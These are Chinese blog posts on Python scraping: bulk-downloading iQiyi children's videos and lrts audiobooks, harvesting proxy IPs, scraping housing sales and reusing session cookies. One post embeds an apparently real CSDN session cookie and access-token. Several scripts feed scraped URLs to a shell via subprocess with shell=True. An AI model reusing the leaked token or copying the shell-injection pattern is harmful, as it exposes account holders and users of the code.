elements=root.xpath('//div[@data-current-count="1"]//li/a/@href')
for items in elements:
song_url = items.replace('//','')
song_url=song_url.strip()
print(song_url)
p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()

def main():
getUrl()

if __name__ == '__main__':
main()
上面的是1-30集的,全部集数现在是120集,31-60的在url 
http://www.iqiyi.com/v_19rrl2td7g.html
 
这个url只要你选择iqiyi视频的右边栏,就会自动变化。 同理也可以找到61-120的url,然后替换到上面代码中最开始的url就可以了。(这里因为页码少,所以就没有用循环去做)
 
最终的下载结果:





 
 
后面修改了下代码,判断文件是不是已经存在,存在的会就不下载,对于长时间下载100多个文件很有用,如果掉线了,重新下载就不会去下载那些已经下好的。
 
#-*-coding=utf-8-*-
import sys,os
import requests
from lxml import etree
import subprocess
session = requests.Session()
def getContent(url):
# url='http://www.iqiyi.com/v_19rrkwcx6w.html'
try:
ret = requests.get(url)
ret.encoding='utf-8'
# except Exception,e:
except:
# print e
return None
if ret.status_code==200:
return ret.text
else:
return None

def getUrl():
url='http://www.iqiyi.com/v_19rrkwcx6w.html'
url2='http://www.iqiyi.com/v_19rrl2td7g.html' # 31-61
content = getContent(url)
if not content:
print "network issue, retry"
exit(0)
root = etree.HTML(content,parser=etree.HTMLParser(encoding='utf-8'))
elements=root.xpath('//div[@data-current-count="1"]//li')
for items in elements:
url_item=items.xpath('.//a/@href')[0]
song_url = url_item.replace('//','')
song_url=song_url.strip()
print(song_url)
# name=items.xpath('.//span[@class="item-num"]/text()')[0]
name=items.xpath('.//span[@class="item-num"]/text()')[0].encode('utf-8').strip()+\
' '+items.xpath('.//span[@class="item-txt"]/text()')[0].encode('utf-8').strip()+'.mp4'
name= '儿歌多多 '+name
name=name.decode('utf-8')
filename=os.path.join(os.getcwd(),name)
print filename
if os.path.exists(filename):
continue
p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()


def main():
getUrl()

if __name__ == '__main__':
main()
 

PS:因为我是边写这个文章边下的,所以才下了几个。
 
 
 原创地址:http://30daydo.com/article/236 
转载请注明出处
 
  查看全部
等有空的时候实现这个功能。
嗅探app的下载路径,然后抓取数据
 
http://30daydo.com/article/236 

更新 ******** 2018-01-09*************
最近才发现以前曾经挖了这个坑,现在来完成它吧。
 
儿歌多多在爱奇艺的视频网站上也有全集,所以目标转为抓取iqiyi的儿歌多多视频列表。 
github上有一个现成的下载iqiyi的第三方库,可以通过python调用这个库来实现下载功能。
 
代码使用python3来实现。
 
1. 打开网页 http://www.iqiyi.com/v_19rrkwcx6w.html#curid=455603300_26b870cbb10342a6b8a90f7f0b225685
 
这个是第一集的儿歌多多,url后面的curid只是一个随机的字符串,可以直接去掉。
 
url=“http://www.iqiyi.com/v_19rrkwcx6w.htm”
浏览器直接查看源码,里面直接包含了1-30集的视频url,那么要做的就是提取这30个url
 
先抓取网页内容:
session = requests.Session()
def getContent(url):
try:
ret = session.get(url)
except:
return None
if ret.status_code==200:
return ret.text
else:
return None

然后提取内容中的url

url.GIF

点击查看大图

提取div标签中的属性 data-current-count=1的。然后选择子节点中的li标签,提取li中的a中的href链接即可。
    content = getContent(url)
root = etree.HTML(content)
elements=root.xpath('//div[@data-current-count="1"]//li/a/@href')
for items in elements:
song_url = items.replace('//','')
song_url=song_url.strip()
print(song_url)





2. 有了url,就可以下载这个页面的中的内容了。
这里我使用的是一个第三方的视频下载库,you-get。(非常好用,fork到自己仓库研究 https://github.com/Rockyzsu/you-get)
 
使用方法:

python you-get -d --format=HD url
 
you-get 需要下载一个ffmpeg.exe的文件来解码视频流的,去官网就可以免费下载。
 
url就是你要下载的url地址,format可以选择高清还是其他格式的,我这里选择的是HD。
 
在python脚本里面调用另外一个python脚本,可以使用subprocess来调用。
        p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()

上面的song_url 就是接着最上面那个代码的。
 
 
完整代码如下:
#-*-coding=utf-8-*-
import requests
from lxml import etree
import subprocess
session = requests.Session()
def getContent(url):
# url='http://www.iqiyi.com/v_19rrkwcx6w.html'
try:
ret = session.get(url)
# except Exception,e:
except:
# print e
return None
if ret.status_code==200:
return ret.text
else:
return None

def getUrl():
url='http://www.iqiyi.com/v_19rrkwcx6w.html'
url2='http://www.iqiyi.com/v_19rrl2td7g.html' # 31-61
content = getContent(url)
root = etree.HTML(content)
elements=root.xpath('//div[@data-current-count="1"]//li/a/@href')
for items in elements:
song_url = items.replace('//','')
song_url=song_url.strip()
print(song_url)
p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()

def main():
getUrl()

if __name__ == '__main__':
main()

上面的是1-30集的,全部集数现在是120集,31-60的在url 
http://www.iqiyi.com/v_19rrl2td7g.html
 
这个url只要你选择iqiyi视频的右边栏,就会自动变化。 同理也可以找到61-120的url,然后替换到上面代码中最开始的url就可以了。(这里因为页码少,所以就没有用循环去做)
 
最终的下载结果:

ergeduoduo.GIF

 
 
后面修改了下代码,判断文件是不是已经存在,存在的会就不下载,对于长时间下载100多个文件很有用,如果掉线了,重新下载就不会去下载那些已经下好的。
 
#-*-coding=utf-8-*-
import sys,os
import requests
from lxml import etree
import subprocess
session = requests.Session()
def getContent(url):
# url='http://www.iqiyi.com/v_19rrkwcx6w.html'
try:
ret = requests.get(url)
ret.encoding='utf-8'
# except Exception,e:
except:
# print e
return None
if ret.status_code==200:
return ret.text
else:
return None

def getUrl():
url='http://www.iqiyi.com/v_19rrkwcx6w.html'
url2='http://www.iqiyi.com/v_19rrl2td7g.html' # 31-61
content = getContent(url)
if not content:
print "network issue, retry"
exit(0)
root = etree.HTML(content,parser=etree.HTMLParser(encoding='utf-8'))
elements=root.xpath('//div[@data-current-count="1"]//li')
for items in elements:
url_item=items.xpath('.//a/@href')[0]
song_url = url_item.replace('//','')
song_url=song_url.strip()
print(song_url)
# name=items.xpath('.//span[@class="item-num"]/text()')[0]
name=items.xpath('.//span[@class="item-num"]/text()')[0].encode('utf-8').strip()+\
' '+items.xpath('.//span[@class="item-txt"]/text()')[0].encode('utf-8').strip()+'.mp4'
name= '儿歌多多 '+name
name=name.decode('utf-8')
filename=os.path.join(os.getcwd(),name)
print filename
if os.path.exists(filename):
continue
p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()


def main():
getUrl()

if __name__ == '__main__':
main()

 

PS:因为我是边写这个文章边下的,所以才下了几个。
 
 
 原创地址:http://30daydo.com/article/236 
转载请注明出处
 
 

批量下载懒人听书mp3文件

李魔佛 发表了文章 • 3 个评论 • 4932 次浏览 • 2017-09-14 01:09 • 来自相关话题

懒人听书是一个不错的在线听书网站, 最近用电脑网页在听。打算把音频文件给下载到手机上,平时的空余时间听听。不过网页版并不提供下载功能。





 
只有安装app后才能下载。
 
装了app也只能一个一个地去下载,所以索性一次过下载全部的音频吧。
 
方法很简单,代码很短。 你也可以看得懂。
 
以财经郎眼的节目音频为例。 其他的节目内容方法差不多的。
 
浏览器打开页面:
http://www.lrts.me/book/32551
 
然后按F12打开调试窗口,我用的是chrome
 
然后看到网页底下有下一页的按钮,点击下一页,看看每一页的url. 就能找到具体的下一页的url.
(待续)
 
 
python代码:
# coding: utf-8
# http://30daydo.com
import urllib

import os
import requests
import time
from lxml import etree
from header_toolkit import getheader


def spider():
curr=os.getcwd()
target_dir=os.path.join(curr,'data')
if not os.path.exists(target_dir):
os.mkdir(target_dir)
for i in range(1, 100, 10):
url = 'http://www.lrts.me/ajax/playlist/2/32551/%d' % i
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}
s = requests.get(url=url, headers=headers)
tree = etree.HTML(s.text)
nodes = tree.xpath('//*[starts-with(@class,"clearfix section-item section")]')
print len(nodes)
for node in nodes:
filename = node.xpath('.//div[@class="column1 nowrap"]/span/text()')[0]
link = node.xpath('.//input[@name="source" and @type="hidden"]/@value')[0]

print link
post_fix=link.split('.')[-1]
full_path= filename+'.'+post_fix
urllib.urlretrieve(link, filename=os.path.join(target_dir,full_path))
time.sleep(1)


if __name__ == '__main__':
spider()

抓取的内容:

 





  查看全部
懒人听书是一个不错的在线听书网站, 最近用电脑网页在听。打算把音频文件给下载到手机上,平时的空余时间听听。不过网页版并不提供下载功能。

懒人听书1.PNG

 
只有安装app后才能下载。
 
装了app也只能一个一个地去下载,所以索性一次过下载全部的音频吧。
 
方法很简单,代码很短。 你也可以看得懂。
 
以财经郎眼的节目音频为例。 其他的节目内容方法差不多的。
 
浏览器打开页面:
http://www.lrts.me/book/32551
 
然后按F12打开调试窗口,我用的是chrome
 
然后看到网页底下有下一页的按钮,点击下一页,看看每一页的url. 就能找到具体的下一页的url.
(待续)
 
 
python代码:
# coding: utf-8
# http://30daydo.com
import urllib

import os
import requests
import time
from lxml import etree
from header_toolkit import getheader


def spider():
curr=os.getcwd()
target_dir=os.path.join(curr,'data')
if not os.path.exists(target_dir):
os.mkdir(target_dir)
for i in range(1, 100, 10):
url = 'http://www.lrts.me/ajax/playlist/2/32551/%d' % i
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}
s = requests.get(url=url, headers=headers)
tree = etree.HTML(s.text)
nodes = tree.xpath('//*[starts-with(@class,"clearfix section-item section")]')
print len(nodes)
for node in nodes:
filename = node.xpath('.//div[@class="column1 nowrap"]/span/text()')[0]
link = node.xpath('.//input[@name="source" and @type="hidden"]/@value')[0]

print link
post_fix=link.split('.')[-1]
full_path= filename+'.'+post_fix
urllib.urlretrieve(link, filename=os.path.join(target_dir,full_path))
time.sleep(1)


if __name__ == '__main__':
spider()


抓取的内容:

 

懒人听书.PNG

 

怎么判断你用的代理是高度匿名还是透明的

李魔佛 发表了文章 • 0 个评论 • 1140 次浏览 • 2017-09-06 20:42 • 来自相关话题

先介绍下什么事高度匿名代理和透明代理.
 

你用透明代理上QQ,对方还是能看到你的本来的IP
只有用匿名和高匿名才不会被对方看到IP.

详细的说:
匿名代理:
如果从隐藏使用代理用户的级别上划分,代理可以分为三种,即高度匿名代理、普通匿名代理和透明代理。

(1)高度匿名代理不改变客户机的请求,这样在服务器看来就像有个真正的客户浏览器在访问它,这时客户的真实IP是隐藏的,服务器端不会认为我们使用了代理。

(2)普通匿名代理能隐藏客户机的真实IP,但会改变我们的请求信息,服务器端有可能会认为我们使用了代理。不过使用此种代理时,虽然被访问的网站不能知道你的ip地址,但仍然可以知道你在使用代理,当然某些能够侦测ip的网页仍然可以查到你的ip。

(3)透明代理,它不但改变了我们的请求信息,还会传送真实的IP地址。
三者隐藏使用代理者身份的级别依次为高度匿名代理最隐蔽,其次是普通匿名代理,最差的是透明代理。
 
 
把你找到的代理iP,在你的浏览器里设置一下, 具体可以百度谷歌, 不难.
 
然后用浏览器打开这个网站:
 
http://members.3322.org/dyndns/getip
 
网站返回很简单, 就是你当前的iP地址. 据目前使用那么多的检测iP地址的网站来看,这个网站最准.
 
用代理打开这个网站,如果网站显示的是你代理IP,那么说明你的ip是高度匿名的.
如果网站显示的是有2个ip,那么你的代理是透明的, 第一个ip是你的原始ip,而第二个ip是你用的代理ip.
 





 
  查看全部
先介绍下什么事高度匿名代理和透明代理.
 

你用透明代理上QQ,对方还是能看到你的本来的IP
只有用匿名和高匿名才不会被对方看到IP.

详细的说:
匿名代理:
如果从隐藏使用代理用户的级别上划分,代理可以分为三种,即高度匿名代理、普通匿名代理和透明代理。

(1)高度匿名代理不改变客户机的请求,这样在服务器看来就像有个真正的客户浏览器在访问它,这时客户的真实IP是隐藏的,服务器端不会认为我们使用了代理。

(2)普通匿名代理能隐藏客户机的真实IP,但会改变我们的请求信息,服务器端有可能会认为我们使用了代理。不过使用此种代理时,虽然被访问的网站不能知道你的ip地址,但仍然可以知道你在使用代理,当然某些能够侦测ip的网页仍然可以查到你的ip。

(3)透明代理,它不但改变了我们的请求信息,还会传送真实的IP地址。
三者隐藏使用代理者身份的级别依次为高度匿名代理最隐蔽,其次是普通匿名代理,最差的是透明代理。
 
 
把你找到的代理iP,在你的浏览器里设置一下, 具体可以百度谷歌, 不难.
 
然后用浏览器打开这个网站:
 
http://members.3322.org/dyndns/getip
 
网站返回很简单, 就是你当前的iP地址. 据目前使用那么多的检测iP地址的网站来看,这个网站最准.
 
用代理打开这个网站,如果网站显示的是你代理IP,那么说明你的ip是高度匿名的.
如果网站显示的是有2个ip,那么你的代理是透明的, 第一个ip是你的原始ip,而第二个ip是你用的代理ip.
 

ip代理.PNG

 
 

lxml.etree._ElementUnicodeResult 转为字符

李魔佛 发表了文章 • 0 个评论 • 4607 次浏览 • 2017-08-14 15:57 • 来自相关话题

在爬虫过程中,使用的是lxml的xpath查找对应的字段。
 

address=each.xpath('.//address/text()')[0].strip()
 
结果用address与一般的字符进行拼接时,总是出现
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
 
这种错误。
 
主要因为python2的蛋疼的编码原因。
 
解决办法:
根据lxml的官方文档:http://lxml.de/api/lxml.etree._ElementUnicodeResult-class.html
 

object --+ | basestring --+ | unicode --+ | _ElementUnicodeResult
 
_ElementUnicodeResult 是unicode的一个子类。
 
那么可以直接将它转为unicode
 
address.encode('utf-8') 就可以了。
  查看全部
在爬虫过程中,使用的是lxml的xpath查找对应的字段。
 

address=each.xpath('.//address/text()')[0].strip()
 
结果用address与一般的字符进行拼接时,总是出现
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
 
这种错误。
 
主要因为python2的蛋疼的编码原因。
 
解决办法:
根据lxml的官方文档:http://lxml.de/api/lxml.etree._ElementUnicodeResult-class.html
 

object --+ | basestring --+ | unicode --+ | _ElementUnicodeResult
 
_ElementUnicodeResult 是unicode的一个子类。
 
那么可以直接将它转为unicode
 
address.encode('utf-8') 就可以了。
 

爬虫获取CSDN用户的排名

李魔佛 发表了文章 • 5 个评论 • 1293 次浏览 • 2017-05-17 12:40 • 来自相关话题

http://30daydo.com/article/185
 
这个是很简单的一个爬虫脚本。 我设置成每周运行一次,这样就可以监测自己的账号每周的排名情况。 还可以绘制成曲线图标,很直观的可以看出每周的排名变化: 
具体的python代码如下:#Get your range of csdn
'''
http://30daydo.com
contact: weigesysu@qq.com
'''
import urllib2,re
import time
link='http://blog.csdn.net/[b]用户名[/b]/article/details/52858314'
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(link, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
#print content
p=re.compile(r'<li>排名:<span>第(\d+)名</span></li>')
result=p.findall(content)
print result[0]

today=time.strftime("%Y-%m-%d")
print today

f=open("data/csdn_range.txt",'a')
contents=today+'\t'+result[0]+'\n'
f.write(contents)
f.close()
只要把代码中的用户名改成你的csdn的用户名就可以了。
然后在linux或者windows设置每周一心一次,程序自动记录到csdn.txt这个文件里头。 查看全部
http://30daydo.com/article/185
 
这个是很简单的一个爬虫脚本。 我设置成每周运行一次,这样就可以监测自己的账号每周的排名情况。 还可以绘制成曲线图标,很直观的可以看出每周的排名变化: 
具体的python代码如下:
#Get your range of csdn
'''
http://30daydo.com
contact: weigesysu@qq.com
'''
import urllib2,re
import time
link='http://blog.csdn.net/[b]用户名[/b]/article/details/52858314'
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(link, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
#print content
p=re.compile(r'<li>排名:<span>第(\d+)名</span></li>')
result=p.findall(content)
print result[0]

today=time.strftime("%Y-%m-%d")
print today

f=open("data/csdn_range.txt",'a')
contents=today+'\t'+result[0]+'\n'
f.write(contents)
f.close()

只要把代码中的用户名改成你的csdn的用户名就可以了。
然后在linux或者windows设置每周一心一次,程序自动记录到csdn.txt这个文件里头。

requests 使用默认 cookies

李魔佛 发表了文章 • 0 个评论 • 928 次浏览 • 2017-03-17 01:41 • 来自相关话题

对于一些网站,为了防止爬虫,必须要有cookies信息,header中的cookies字段不能空。
使用requests库的时候,可以初始化一次cookies信息,后面的回话就能够一直用这个cookies了。session=requests.session()
#先创建一个seession

s=session.get('http://xueqiu.com',headers=self.headers)
#随意建立一个访问雪球的session,此时的session就自带了雪球的cookies

url='https://xueqiu.com/snowmart/push/stocks.json?product_id=19&page=3&count=5'
headers['Referer']='https://xueqiu.com/strategy/19'
headers['X-Requested-With']='XMLHttpRequest'
headers['DNT']='1'

data={'product_id':19,'page':3,'count':5}

resp=session.get(url,headers=self.headers,params=data).text
#如果这里用的request.get的话,就不能获取到网页返回的正确内容
print resp 这里需要注意的是,第一次

s=session.get('http://xueqiu.com',headers=self.headers) #随意建立一个访问雪球的session,此时的session就自带了雪球的cookies
 
是必须的,如果没有只一次正常访问,cookies就不能保存下来供下一次正常使用。
 
 
2017-3-28 更新
一般来说,除非是为了每天定期跑的或者破解他人密码这些,可以不用管他们的登录问题,可以很直接的在浏览器中,把你自己账号的cookie信息写进到request的header里面,完全可以访问。
 
所以一旦cookie被别人获取了,他们就可以构造数据,去获取你账号的相关信息。 (cookie应该和你的电脑硬件没关系的吧? 因为我曾经在几台机器上用同一个cookie获取我登录了的账号,也是没有问题的)
 
举个栗子:

def csdn():
session=requests.session()
header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36'}
url='[url]http://msg.csdn.net/'[/url] header['Cookie']='uuid_tt_dd=-5697318013068753627_20160111; _ga=GA1.2.795042232.1452766190; _message_m=quvq2wle24wa4awe UserInfo=zMhiNgesgIlEBQ3TOqLCtx4nUI360IIq3ciBzg4EKH%2FW8mSpTANpu5cTlRFLj2Tqh%2FZzQr2rNqDtT1SZz%2Be2%2FpDkGoQxDK3IVUZXvwZ%2FEP1I4UTg6MoZkH7LDO3sjrJJ; UserNick=%E9%87%8D%E5%A4%8D%E7%9A%84%E7%94%9F%E6%B4%BB; AU=0F1; UD=%E8%AE%B0%E5%BD%95%E8%87%AA%E5%AD%A6%E7%9A%84%E5%8E%86%E7%A8%8B+%E5%88%83%E8%8D%; BT=1490707396344; access-token=c2e12bff-5b27-4a91-953b-448ff6f6beac; _csdn_notify_admin_session=VE41a0d3TitrVGY2bGtXY09pZENwR1lHenhUU1NVaWc1b04wL1I3dCtDQVdadWpjMXBzdGRJL0RZR04wYldvZDBhTU96b2oycVVKeVI1UEVyUHFKbG1yNnB2b2pHRWVnWG1uc2JMM2R3YWthakRyTXZNaEpVU1NtUy9zQUJrNjd3R2lpbG5PK0paMnlyc1dyK0lTZUtRPT0tLXlPQUE1QzF5UmhDNjEvSFdtRFlQS2c9PQ%3D%3D--4569c5a32916dcf969a8b7e007c37abeb90be4f3; dc_tos=onj1dg; dc_session_id=1490707393375; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1490024083,1490024559,1490374375,1490707368; Hm_lpvt_6bcd52f51e9b3dce32bec4a3997715ac=1490707638' header['Cache-Control']='max-age=0'
header['Host']='msg.csdn.net'
header['Referer']='http://blog.csdn.net/username'
resp=requests.get(url,headers=header)
print resp.text
 
上面这段代码,只要你改一下cookie和 Refer 的连接,改成你自己的用户名。 你就可以访问你的csdn的消息,也就是别人在你的csdn博客访问的的留言,评论。
 
只是这个cookie只能在某个时间段生效,也就是存活期大概就一个星期左右。

 抓包技术过硬,何须模拟登陆?
 
 
http://30daydo.com/publish/article/155
  查看全部
对于一些网站,为了防止爬虫,必须要有cookies信息,header中的cookies字段不能空。
使用requests库的时候,可以初始化一次cookies信息,后面的回话就能够一直用这个cookies了。
session=requests.session()
#先创建一个seession

s=session.get('http://xueqiu.com',headers=self.headers)
#随意建立一个访问雪球的session,此时的session就自带了雪球的cookies

url='https://xueqiu.com/snowmart/push/stocks.json?product_id=19&page=3&count=5'
headers['Referer']='https://xueqiu.com/strategy/19'
headers['X-Requested-With']='XMLHttpRequest'
headers['DNT']='1'

data={'product_id':19,'page':3,'count':5}

resp=session.get(url,headers=self.headers,params=data).text
#如果这里用的request.get的话,就不能获取到网页返回的正确内容
print resp
 这里需要注意的是,第一次

s=session.get('http://xueqiu.com',headers=self.headers) #随意建立一个访问雪球的session,此时的session就自带了雪球的cookies
 
是必须的,如果没有只一次正常访问,cookies就不能保存下来供下一次正常使用。
 
 
2017-3-28 更新
一般来说,除非是为了每天定期跑的或者破解他人密码这些,可以不用管他们的登录问题,可以很直接的在浏览器中,把你自己账号的cookie信息写进到request的header里面,完全可以访问。
 
所以一旦cookie被别人获取了,他们就可以构造数据,去获取你账号的相关信息。 (cookie应该和你的电脑硬件没关系的吧? 因为我曾经在几台机器上用同一个cookie获取我登录了的账号,也是没有问题的)
 
举个栗子:


def csdn():
session=requests.session()
header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36'}
url='[url]http://msg.csdn.net/'[/url]
    header['Cookie']='uuid_tt_dd=-5697318013068753627_20160111; _ga=GA1.2.795042232.1452766190; _message_m=quvq2wle24wa4awe UserInfo=zMhiNgesgIlEBQ3TOqLCtx4nUI360IIq3ciBzg4EKH%2FW8mSpTANpu5cTlRFLj2Tqh%2FZzQr2rNqDtT1SZz%2Be2%2FpDkGoQxDK3IVUZXvwZ%2FEP1I4UTg6MoZkH7LDO3sjrJJ; UserNick=%E9%87%8D%E5%A4%8D%E7%9A%84%E7%94%9F%E6%B4%BB; AU=0F1; UD=%E8%AE%B0%E5%BD%95%E8%87%AA%E5%AD%A6%E7%9A%84%E5%8E%86%E7%A8%8B+%E5%88%83%E8%8D%; BT=1490707396344; access-token=c2e12bff-5b27-4a91-953b-448ff6f6beac; _csdn_notify_admin_session=VE41a0d3TitrVGY2bGtXY09pZENwR1lHenhUU1NVaWc1b04wL1I3dCtDQVdadWpjMXBzdGRJL0RZR04wYldvZDBhTU96b2oycVVKeVI1UEVyUHFKbG1yNnB2b2pHRWVnWG1uc2JMM2R3YWthakRyTXZNaEpVU1NtUy9zQUJrNjd3R2lpbG5PK0paMnlyc1dyK0lTZUtRPT0tLXlPQUE1QzF5UmhDNjEvSFdtRFlQS2c9PQ%3D%3D--4569c5a32916dcf969a8b7e007c37abeb90be4f3; dc_tos=onj1dg; dc_session_id=1490707393375; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1490024083,1490024559,1490374375,1490707368; Hm_lpvt_6bcd52f51e9b3dce32bec4a3997715ac=1490707638'
    header['Cache-Control']='max-age=0'
header['Host']='msg.csdn.net'
header['Referer']='http://blog.csdn.net/username'
resp=requests.get(url,headers=header)
print resp.text

 
上面这段代码,只要你改一下cookie和 Refer 的连接,改成你自己的用户名。 你就可以访问你的csdn的消息,也就是别人在你的csdn博客访问的的留言,评论。
 
只是这个cookie只能在某个时间段生效,也就是存活期大概就一个星期左右。


 抓包技术过硬,何须模拟登陆?
 
 
http://30daydo.com/publish/article/155
 

python 爬虫 urllib/requests 中文乱码 终极解决

李魔佛 发表了文章 • 0 个评论 • 1291 次浏览 • 2017-03-11 16:17 • 来自相关话题

如果使用的是reqests的包 content=requests.get(url,headers=self.header)
content.encoding='gbk'
print content.text 一般情况 是直接可以content.text 就可以输出网页的内容,不过如果网页的编码不是utf-8的话,需要手动编码
content.encoding='gbk' 
这样content.text就可以正常显示中文。
 
  查看全部
如果使用的是reqests的包
            content=requests.get(url,headers=self.header)
content.encoding='gbk'
print content.text
 一般情况 是直接可以content.text 就可以输出网页的内容,不过如果网页的编码不是utf-8的话,需要手动编码
content.encoding='gbk' 
这样content.text就可以正常显示中文。
 
 

自动抢雪球红包 python代码

李魔佛 发表了文章 • 0 个评论 • 7019 次浏览 • 2017-01-25 12:29 • 来自相关话题

ETA 1.30
Link https://github.com/Rockyzsu/red_bag​ 
 
 

每天自动获取深圳上海北京的新房二手房的成交量

李魔佛 发表了文章 • 2 个评论 • 9620 次浏览 • 2016-10-10 14:28 • 来自相关话题

静观其变,目前的态势不宜参与进去。

每天自动获取深圳上海北京的新房二手房的成交量
深圳市房地产信息系统:http://ris.szpl.gov.cn/
 





 




#-*-coding=utf-8-*-
__author__ = 'rocky'
#获取每天深圳一手房,二手房的成交套数与面积,并且写入数据库
#主要就是正则表达抓取几个数字
import urllib2,re
import database
def getContent():
url="http://ris.szpl.gov.cn/"
one_hand="credit/showcjgs/ysfcjgs.aspx"
second_hand="credit/showcjgs/esfcjgs.aspx"
req=urllib2.Request(url+one_hand)
content=urllib2.urlopen(req).read()
#返回的就是网页的源码,没有做任何防爬虫的处理,zf网站,呵呵
#print content
date=re.compile(r'<SPAN class=titleblue><span id=\"lblCurTime5\">(.*)</span>')
reg=re.compile(r'<td width="14%"><b>(\d+)</b>')
result=reg.findall(content)
current_date=date.findall(content)

reg2=re.compile(r'<td align="right"><b>(.*?)</b>')
yishou_area=reg2.findall(content)


print current_date[0]
print '一手商品房成交套数:%s' % result[0]
print '一手商品房成交面积: %s' % yishou_area[0]


sec_req=urllib2.Request(url+second_hand)
sec_content=urllib2.urlopen(sec_req).read()

sec_quantity=re.compile(r'<td width="30%">(\d+)</td>')
sec_result=sec_quantity.findall(sec_content)
second_area=re.findall(r'<td align="right">(.*?)</td>',sec_content)

print '二手商品房成交套数:%s' % sec_result[1]
print '二手商品房成交面积: %s' % second_area[2]
database.create_table()
database.insert(current_date[0],result[0],yishou_area[0],sec_result[1],second_area[2])

getContent()
 github代码:https://github.com/Rockyzsu/house​
 

  查看全部
静观其变,目前的态势不宜参与进去。

每天自动获取深圳上海北京的新房二手房的成交量
深圳市房地产信息系统:http://ris.szpl.gov.cn/
 

一手.PNG

 

house.PNG
#-*-coding=utf-8-*-
__author__ = 'rocky'
#获取每天深圳一手房,二手房的成交套数与面积,并且写入数据库
#主要就是正则表达抓取几个数字
import urllib2,re
import database
def getContent():
url="http://ris.szpl.gov.cn/"
one_hand="credit/showcjgs/ysfcjgs.aspx"
second_hand="credit/showcjgs/esfcjgs.aspx"
req=urllib2.Request(url+one_hand)
content=urllib2.urlopen(req).read()
#返回的就是网页的源码,没有做任何防爬虫的处理,zf网站,呵呵
#print content
date=re.compile(r'<SPAN class=titleblue><span id=\"lblCurTime5\">(.*)</span>')
reg=re.compile(r'<td width="14%"><b>(\d+)</b>')
result=reg.findall(content)
current_date=date.findall(content)

reg2=re.compile(r'<td align="right"><b>(.*?)</b>')
yishou_area=reg2.findall(content)


print current_date[0]
print '一手商品房成交套数:%s' % result[0]
print '一手商品房成交面积: %s' % yishou_area[0]


sec_req=urllib2.Request(url+second_hand)
sec_content=urllib2.urlopen(sec_req).read()

sec_quantity=re.compile(r'<td width="30%">(\d+)</td>')
sec_result=sec_quantity.findall(sec_content)
second_area=re.findall(r'<td align="right">(.*?)</td>',sec_content)

print '二手商品房成交套数:%s' % sec_result[1]
print '二手商品房成交面积: %s' % second_area[2]
database.create_table()
database.insert(current_date[0],result[0],yishou_area[0],sec_result[1],second_area[2])

getContent()

 github代码:https://github.com/Rockyzsu/house​
 

 

python 爬虫获取XiciDaili代理IP

李魔佛 发表了文章 • 20 个评论 • 12371 次浏览 • 2016-08-11 23:17 • 来自相关话题

默认获取前5页的代理IP,验证其是否有效,然后使用sqlite存储为本地db文件。

 
 




 class getProxy():

def __init__(self):
self.user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
self.header = {"User-Agent": self.user_agent}
self.dbname="proxy.db"
self.now = time.strftime("%Y-%m-%d")

def getContent(self, num):
nn_url = "http://www.xicidaili.com/nn/" + str(num)
#国内高匿
req = urllib2.Request(nn_url, headers=self.header)
resp = urllib2.urlopen(req, timeout=10)
content = resp.read()
et = etree.HTML(content)
result_even = et.xpath('//tr[@class=""]')
result_odd = et.xpath('//tr[@class="odd"]')
#因为网页源码中class 分开了奇偶两个class,所以使用lxml最方便的方式就是分开获取。
#刚开始我使用一个方式获取,因而出现很多不对称的情况,估计是网站会经常修改源码,怕被其他爬虫的抓到
#使用上面的方法可以不管网页怎么改,都可以抓到ip 和port
for i in result_even:
t1 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t1[0], t1[1])
if self.isAlive(t1[0], t1[1]):

self.insert_db(self.now,t1[0],t1[1])
for i in result_odd:
t2 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t2[0], t2[1])
if self.isAlive(t2[0], t2[1]):
self.insert_db(self.now,t2[0],t2[1])
接着实现写插入数据库函数:def insert_db(self,date,ip,port):
dbname=self.dbname
try:
conn=sqlite3.connect(dbname)
except:
print "Error to open database%" %self.dbname
create_tb='''
CREATE TABLE IF NOT EXISTS PROXY
(DATE TEXT,
IP TEXT,
PORT TEXT
);
'''
conn.execute(create_tb)
insert_db_cmd='''
INSERT INTO PROXY (DATE,IP,PORT) VALUES ('%s','%s','%s');
''' %(date,ip,port) #写入时间,ip和端口
conn.execute(insert_db_cmd)
conn.commit() #记得commit
conn.close()





